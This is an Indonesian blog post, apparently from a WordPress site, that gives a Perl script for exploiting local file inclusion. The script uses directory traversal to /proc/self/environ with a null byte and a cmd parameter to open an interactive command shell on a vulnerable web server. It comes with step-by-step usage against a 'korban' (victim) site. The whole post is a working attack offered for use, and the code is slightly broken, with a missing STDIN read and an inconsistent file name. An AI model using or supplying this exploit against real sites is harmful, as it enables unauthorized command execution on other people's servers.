LFI Remote Execute in PERL

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell.

#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " LFI Command Execution \n";
print "==========================================\n";
print "Usage: perl LFI.pl (without http:://)\n";
print "Ex. perl FLI.pl http://www.korban.com/index.php?page=\n";
exit;
}
$host=$ARGV[0];
$lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = );
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host.$lfi."%00&cmd=".$cmd);
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = );
}

Cara menggunakannya adalah:
1. Install perl di komputer anda / komputer target (bersyukurlah kalau sudah terinstall)
2. Save file di atas: “LFI.pl”
3. Kemudian jalankan dengan perintah: “perl FLI.pl http://www.targetwebsiteanda.com/index.php?page=\n”
4. Tunggu hasilnya :)

Semoga berhasil & selamat mengeksplore!

Iklan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google+

You are commenting using your Google+ account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

w

Connecting to %s

%d blogger menyukai ini: